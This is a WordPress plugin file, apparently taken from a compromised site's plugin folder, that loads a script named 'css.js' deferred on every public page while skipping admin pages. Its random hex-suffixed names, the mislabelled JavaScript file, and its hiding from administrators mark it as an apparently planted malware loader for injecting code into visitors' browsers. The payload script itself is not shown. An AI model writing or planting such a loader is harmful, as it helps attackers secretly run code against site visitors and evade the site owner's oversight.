File: //home/p8pyefaexf70/public_html/wp-content/plugins/analytics-1772876565/file-updater-7b52e912.php
<?php
/**
* Plugin Name: file-updater
* Description: Loads the embedded script on all frontend pages.
* Version: 1.0.0
*/
if (!defined('ABSPATH')) { exit; }
function wp_7b52e912_enqueue() {
if (is_admin()) { return; }
$handle = 'h_7b52e912';
$src = plugins_url('assets/css.js', __FILE__);
wp_enqueue_script($handle, $src, [], null, true);
}
add_action('wp_enqueue_scripts', 'wp_7b52e912_enqueue');
function wp_7b52e912_defer_attr($tag, $handle, $src) {
if ($handle !== 'h_7b52e912') { return $tag; }
if (strpos($tag, ' defer') !== false) { return $tag; }
return str_replace(' src=', ' defer src=', $tag);
}
add_filter('script_loader_tag', 'wp_7b52e912_defer_attr', 10, 3);